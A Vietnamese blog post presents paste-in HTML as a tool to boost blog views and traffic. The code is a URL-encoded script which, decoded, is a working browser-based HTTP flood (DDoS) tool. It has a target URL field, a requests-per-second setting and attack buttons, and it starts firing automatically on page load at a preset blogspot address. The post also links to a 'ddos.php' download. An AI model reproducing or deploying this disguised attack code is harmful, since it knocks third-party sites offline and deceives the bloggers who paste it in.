HƯỚNG DẪN TẠO CÔNG CỤ TĂNG VIEW ONLINE CHO BLOG

xin chào các bạn đã quay trở lại với blogs star út , lâu rồi mình chưa share cái gì đó về tools hay công cụ.Cho các bạn , ak tình cờ mấy bữa nay mài mò vọc vạch và tạo ra được một vài công cụ khá hữu ích dành cho website it người biết đến , có thể giúp họ tăng được khá nhiều lưu lượng traffic cho blog , website ,youtube, ...

HƯỚNG DẪN THỰC HIỆN

Các bạn chỉ cần copy đoạn code bên dưới và truy cập vào Trang => trang mới => sang html => dán đoạn code bên dưới vào và lưu lại là được. Hoặc đặt nơi muốn đặt
<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-1ZdKP4sh-R0/WvcY90RjnjI/AAAAAAAAIqQ/hxf5xQ330sUOwPpziDRjUuMHymEnmKObQCLcBGAs/s1600/one-of-the-largest-bitcoin-exchange-bitfinex-hit-by-massive-ddos-attacks-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="400" data-original-width="760" height="336" src="https://3.bp.blogspot.com/-1ZdKP4sh-R0/WvcY90RjnjI/AAAAAAAAIqQ/hxf5xQ330sUOwPpziDRjUuMHymEnmKObQCLcBGAs/s640/one-of-the-largest-bitcoin-exchange-bitfinex-hit-by-massive-ddos-attacks-1.png" width="640" /></a></div>
<br /></div>
<center>
<a class="bsw-btn bsw_btn" href="https://leminhut09.000webhostapp.com/ddos.php" target="blank" title="Download">DDOS PHP</a></center>
<script>
<!--
document.write(unescape("%3Cdiv%20dir%3D%22ltr%22%20style%3D%22text-align%3A%20left%3B%22%20trbidi%3D%22on%22%3E%0A%3Cmarquee%20direction%3D%22left%22%20style%3D%22background%3A%20orange%3B%22%3El%u01B0u%20%FD%20m%E1y%20Ram%20y%u1EBFu%20v%E0%20d%F9ng%20%u0111i%u1EC7n%20tho%u1EA1i%20th%F4ng%20n%EAn%20ch%u1EA1y%20tools%20n%E0y%20v%EC%20ch%FAng%20fresh%20r%u1EA5t%20nhanh%20c%F3%20th%u1EC3%20l%E0m%20treo%20%2C%20%u0111%u01A1%20m%E1y%20th%u1EADm%20th%ED%20x%F3a%20x%u1EA1ch%20d%u1EEF%20li%u1EC7u%20m%E1y%20b%u1EA1n%20%u0111ang%20d%F9ng%20%2C%20th%EDch%20h%u1EE3p%20ch%E1y%20ch%FAng%20tr%EAn%20nh%u1EEFng%20m%E1y%20ram%20m%u1EA1nh%20%2C%20v%E0%20m%E1y%20t%EDnh%20c%u1EA5u%20h%ECnh%20cao%3C/marquee%3E%3Cbr%20/%3E%0A%3Cdiv%20dir%3D%22ltr%22%20style%3D%22text-align%3A%20left%3B%22%20trbidi%3D%22on%22%3E%0A%3Ch2%20style%3D%22background%3A%200px%200px%20rgb%28255%2C%20255%2C%20255%29%3B%20border-bottom-style%3A%20solid%3B%20border-color%3A%20initial%3B%20border-image%3A%20initial%3B%20border-left-style%3A%20initial%3B%20border-right-style%3A%20initial%3B%20border-top-style%3A%20solid%3B%20border-width%3A%201px%200px%202px%3B%20color%3A%20%23bc382e%3B%20font-stretch%3A%20normal%3B%20font-variant-east-asian%3A%20normal%3B%20font-variant-numeric%3A%20normal%3B%20letter-spacing%3A%201px%3B%20line-height%3A%20normal%3B%20margin%3A%2010px%200px%3B%20outline%3A%200px%3B%20padding%3A%2010px%200px%3B%20position%3A%20relative%3B%20text-align%3A%20center%3B%20text-transform%3A%20uppercase%3B%20transition%3A%200.4s%3B%20vertical-align%3A%20baseline%3B%22%3E%0A%3Cspan%20style%3D%22font-family%3A%20%26quot%3Broboto%26quot%3B%20%2C%20sans-serif%3B%20font-size%3A%20medium%3B%22%3E%3Cb%3E%u0110i%u1EC1n%20link%20c%u1EA7n%20t%u1EA5n%20c%F4ng%3C/b%3E%3C/span%3E%3C/h2%3E%0A%3Clabel%3E%3Cinput%20id%3D%22targetURL%22%20name%3D%22xD%22%20style%3D%22width%3A%20180%25%3B%22%20value%3D%22https%3A//leminhut09.000webhostapp.com/ddos_starut.php%22%20/%3E%3C/label%3E%0A%0A%3Cfieldset%3E%0A%3Ch4%3E%0AT%u1EA5n%20c%F4ng%3C/h4%3E%0A%3Cbutton%20class%3D%22btn%20btn-info%22%20id%3D%22fireButton%22%3ED%u1EEBng%20t%u1EA5n%20c%F4ng%3C/button%3E%0A%3C/fieldset%3E%0A%3Cfieldset%3E%0A%3Clabel%3E%0A%3Cspan%20id%3D%22result_box%22%3E%0A%3Cspan%20title%3D%22Requests%20per%20second%22%3Ehow%20to%20fresh%3C/span%3E%0A%3C/span%3E%0A%3Cinput%20id%3D%22rps%22%20style%3D%22width%3A%20100%25%3B%22%20value%3D%225000%22%20/%3E%0A%3C/label%3E%3Cbr%20/%3E%0A%3Clabel%3EL%u1EDDi%20g%u1EEDi%20t%u1EDBi%20server%20%3A%0A%3Cinput%20id%3D%22message%22%20style%3D%22width%3A%20100%25%3B%22%20value%3D%22Ng%u1EE7m%20%u0111i%20c%u1EE5c%20c%u01B0ng%20%26lt%3B3%22%20/%3E%0A%3C/label%3E%0A%3C/fieldset%3E%0A%3Cfieldset%3E%0A%3Ch4%3E%0ATr%u1EA1ng%20th%E1i%20t%u1EA5n%20c%F4ng%3C/h4%3E%0A%3Cdl%20style%3D%22float%3A%20left%3B%22%3E%0A%3Cdt%3E%3Cspan%20style%3D%22color%3A%20red%3B%22%3ET%u1EA5n%20c%F4ng%3A%3C/span%3E%3C/dt%3E%0A%3Cdd%20id%3D%22requestedCtr%22%3E53933%3C/dd%3E%0A%3Cdt%3E%3Cspan%20style%3D%22color%3A%20red%3B%22%3ETh%E0nh%20c%F4ng%3A%3C/span%3E%3C/dt%3E%0A%3Cdd%20id%3D%22succeededCtr%22%3E48291%3C/dd%3E%0A%3Cdt%3E%3Cspan%20style%3D%22color%3A%20red%3B%22%3ETh%u1EA5t%20b%u1EA1i%3A%3C/span%3E%3C/dt%3E%0A%3Cdd%20id%3D%22failedCtr%22%3E0%3C/dd%3E%0A%3C/dl%3E%0A%3C/fieldset%3E%0A%3Cscript%3E%0A%28function%20%28%29%20%7B%0Avar%20fireInterval%3B%0Avar%20isFiring%20%3D%20false%3B%0Avar%20currentTime%20%3D%20new%20Date%28%29%0Avar%20lastSuccess%20%3D%20currentTime.getTime%28%29%3B%0Avar%20requestedCtrNode%20%3D%20document.getElementById%28%22requestedCtr%22%29%2C%0AsucceededCtrNode%20%3D%20document.getElementById%28%22succeededCtr%22%29%2C%0AfailedCtrNode%20%3D%20document.getElementById%28%22failedCtr%22%29%2C%0AtargetURLNode%20%3D%20document.getElementById%28%22targetURL%22%29%2C%0AfireButton%20%3D%20document.getElementById%28%22fireButton%22%29%2C%0AmessageNode%20%3D%20document.getElementById%28%22message%22%29%2C%0ArpsNode%20%3D%20document.getElementById%28%22rps%22%29%2C%0AtimeoutNode%20%3D%20document.getElementById%28%22timeout%22%29%3B%0Avar%20targetURL%20%3D%20targetURLNode.value%3B%0A%0AtargetURLNode.onchange%20%3D%20function%20%28%29%20%7B%0AtargetURL%20%3D%20this.value%3B%0A%7D%3B%0A%0Avar%20requestsHT%20%3D%20%7B%7D%3B%0Avar%20requestedCtr%20%3D%200%2C%0AsucceededCtr%20%3D%200%2C%0AfailedCtr%20%3D%200%3B%0Avar%20makeHttpRequest%20%3D%20function%20%28%29%20%7B%0Aif%20%28%20%28currentTime.getTime%28%29-lastSuccess%29%20%3E%2010000%29%20%7B%20%0Areturn%3B%0A%7D%20else%20%7B%20lastSuccess%20%3D%20currentTime.getTime%28%29%3B%7D%3B%0A%0Avar%20rID%20%3DNumber%28new%20Date%28%29%29%3B%0Avar%20img%20%3D%20new%20Image%28%29%3B%0Aimg.onerror%20%3D%20function%20%28%29%20%7B%20onFail%28rID%29%3B%20%7D%3B%0Aimg.onabort%20%3D%20function%20%28%29%20%7B%20onFail%28rID%29%3B%20%7D%3B%0Aimg.onload%20%3D%20function%20%28%29%20%7B%20onSuccess%28rID%29%3B%20%7D%3B%0A%0Aimg.setAttribute%28%22src%22%2C%20targetURL%20+%20%22%3Fid%3D%22%20+%20rID%20+%20%22%26msg%3D%22%20+%20messageNode.value%29%3B%0ArequestsHT%5BrID%5D%20%3D%20img%3B%0AonRequest%28rID%29%3B%0A%7D%3B%0A%0Avar%20onRequest%20%3D%20function%20%28rID%29%20%7B%0ArequestedCtr++%3B%0ArequestedCtrNode.innerHTML%20%3D%20requestedCtr%3B%0A%7D%3B%0A%0Avar%20onComplete%20%3D%20function%20%28rID%29%20%7B%0Adelete%20requestsHT%5BrID%5D%3B%0A%7D%3B%0A%0Avar%20onFail%20%3D%20function%20%28rID%29%20%7B%0AsucceededCtr++%3B%20%0AsucceededCtrNode.innerHTML%20%3D%20succeededCtr%3B%0Adelete%20requestsHT%5BrID%5D%3B%20%0A%7D%3B%0A%0Avar%20onSuccess%20%3D%20function%20%28rID%29%20%7B%0AsucceededCtr++%3B%0AsucceededCtrNode.innerHTML%20%3D%20succeededCtr%3B%0Adelete%20requestsHT%5BrID%5D%3B%0A%7D%3B%0A%0AfireButton.onclick%20%3D%20function%20%28%29%20%7B%0Aif%20%28isFiring%29%20%7B%0AclearInterval%28fireInterval%29%3B%0AisFiring%20%3D%20false%3B%0Athis.innerHTML%20%3D%20%22%u0110%E1nh%20ti%u1EBFp%22%3B%0A%7D%20else%20%7B%0AisFiring%20%3D%20true%3B%0Athis.innerHTML%20%3D%20%22D%u1EEBng%20%u0111%E1nh%22%3B%0AfireInterval%20%3D%20setInterval%28makeHttpRequest%2C%20%2810000%20/%20parseInt%28rpsNode.value%29%20%7C%200%29%29%3B%0A%7D%0A%7D%3B%0A%0Afunction%20Firecolombianew%28%29%20%7B%0Aif%20%28isFiring%29%20%7B%0AclearInterval%28fireInterval%29%3B%0AisFiring%20%3D%20false%3B%0Athis.innerHTML%20%3D%20%22Shoot%20Again%21%22%3B%0A%7D%20else%20%7B%0AisFiring%20%3D%20true%3B%0Athis.innerHTML%20%3D%20%22Stop%20flooding%22%3B%0AfireInterval%20%3D%20setInterval%28makeHttpRequest%2C%20%281000%20/%20parseInt%28rpsNode.value%29%20%7C%200%29%29%3B%0A%7D%0A%7D%3B%0A%0Adocument.getElementById%28%22targetURL%22%29.value%20%3D%20%22https%3A//leminhut.blogspot.com/%22%3B%0AFirecolombianew%28%29%3B%0A%7D%29%28%29%3B%0A%3C/script%3E%0A%0A%3Cbr%20/%3E%0A%3Cdiv%20style%3D%22clear%3A%20both%3B%22%3E%0A%3C/div%3E%0A%3C/div%3E%0A%3Cdiv%20dir%3D%22ltr%22%20style%3D%22text-align%3A%20left%3B%22%20trbidi%3D%22on%22%3E%0A%3Ch2%20style%3D%22background%3A%200px%200px%20rgb%28255%2C%20255%2C%20255%29%3B%20border-bottom-style%3A%20solid%3B%20border-color%3A%20initial%3B%20border-image%3A%20initial%3B%20border-left-style%3A%20initial%3B%20border-right-style%3A%20initial%3B%20border-top-style%3A%20solid%3B%20border-width%3A%201px%200px%202px%3B%20color%3A%20%23bc382e%3B%20font-family%3A%20Roboto%3B%20font-size%3A%2015px%3B%20font-stretch%3A%20normal%3B%20font-variant-east-asian%3A%20normal%3B%20font-variant-numeric%3A%20normal%3B%20font-weight%3A%20500%3B%20letter-spacing%3A%201px%3B%20line-height%3A%20normal%3B%20margin%3A%2010px%200px%3B%20outline%3A%200px%3B%20padding%3A%2010px%200px%3B%20position%3A%20relative%3B%20text-align%3A%20center%3B%20text-transform%3A%20uppercase%3B%20transition%3A%200.4s%3B%20vertical-align%3A%20baseline%3B%22%3E%0A%3Cspan%20style%3D%22font-family%3A%20%26quot%3Broboto%26quot%3B%20%2C%20sans-serif%3B%20font-size%3A%20small%3B%22%3EL%u1EDCI%20K%u1EBET%3C/span%3E%3C/h2%3E%0A%3Cdiv%3E%0A%3Cspan%20style%3D%22font-family%3A%20%26quot%3Broboto%26quot%3B%20%2C%20sans-serif%3B%20font-size%3A%20small%3B%22%3EB%EAn%20tr%EAn%20l%E0%20tools%20ddos%20online%20m%u1EDBi%20v%u1EEBa%20%u0111%u01B0%u1EE3c%20m%ECnh%20t%EDch%20h%u1EE3p%20v%E0o%20blog%2C%20%3Cb%3El%u01B0u%20%FD%20%3A%20%3C/b%3Etools%20n%E0y%20%u0111ang%20trong%20th%u1EDDi%20gian%20ph%E1t%20tri%u1EC3n%20v%E0%20ch%u1EA1y%20th%u1EED%20nghi%u1EC7m%20tr%EAn%20blogger%20n%EAn%20v%u1EABn%20ch%u01B0a%20%u1ED5n%20%u0111%u1ECBnh%20l%u1EAFm%20m%ECnh%20s%u1EBD%20c%u1ED1%20g%u1EAFng%20n%E2ng%20c%u1EA5p%20th%EAm%20%u0111%u1EBFn%20cho%20ho%E0n%20thi%u1EC7n.%3C/span%3E%3C/div%3E%0A%3Cdiv%3E%0A%3Cspan%20style%3D%22font-family%3A%20%26quot%3Broboto%26quot%3B%20%2C%20sans-serif%3B%20font-size%3A%20small%3B%22%3E%3Cb%3E%3Cspan%20style%3D%22color%3A%20red%3B%22%3EC%C1CH%20B%C1O%20%3A%20%3C/span%3EToosl%20n%E0y%20mang%20t%EDnh%20ch%u1EA5t%20ph%E1%20ho%u1EA1i%20%2C%20m%u1ECDi%20thi%u1EC7t%20h%u1EA1i%20c%E1c%20b%u1EA1n%20ho%E0n%20to%E0n%20ch%u1ECBu%20tr%E1ch%20nhi%u1EC7m%20nh%E9%20.%3C/b%3E%3C/span%3E%3C/div%3E%0A%3Cdiv%3E%0A%3Cspan%20style%3D%22font-family%3A%20%26quot%3Broboto%26quot%3B%20%2C%20sans-serif%3B%20font-size%3A%20small%3B%22%3E%3Cb%3E%3Cspan%20style%3D%22color%3A%20red%3B%22%3EL%u01B0u%20%DD%20%3A%20%3C/span%3Etools%20n%E0y%20m%ECnh%20ch%u1EC9%20t%u1EA1o%20ra%20m%u1EE5c%20%u0111%EDch%20%u0111%u1EC3%20t%u0103ng%20th%EAm%20l%u01B0%u1EE3ng%20traffic%20cho%20website%20c%u1EA5m%20l%u1EA1m%20d%u1EE5ng%20v%E0o%20vi%u1EC7c%20x%u1EA5u%20d%u01B0%u1EDBi%20m%u1ECDi%20h%ECnh%20th%u1EE9c.%3C/b%3E%3C/span%3E%3C/div%3E%0A%3C/div%3E%0A%3C/div%3E%0A"));
//-->
</script>
</div>

LỜI KẾT

Chỉ vài bước đơn giản mình đã hướng đẫn xong cho các bạn tạo một tiện ích tăng view cực chất cho blog rồi đó đúng không nào.
Lưu ý : bài viết được độc quyền tại star út bạn nào có copy hay share lại nhớ để nguồn hộ mình nhé cảm ơn nhiều .
LIVE DEMO
...
  • Do thiếu hụt kinh phí nên chúng tôi buộc phải chạy quảng cáo để duy trì website. Chúng tôi rất xin lỗi về sự bất tiện này! !
  • Mọi thứ trên website đều là miễn phí.Được Leech Từ Nhiều Nguồn , Nếu Có Vấn Đề Bản Quyền Hãy Liên Hệ Với Chúng Tôi!
  • Tuyệt đối không click spam (click tặc quảng cáo). Hãy là một người sử dụng internet thông minh và có văn hóa! Xin cảm ơn.
CÓ THỂ BẠN ĐANG TÌM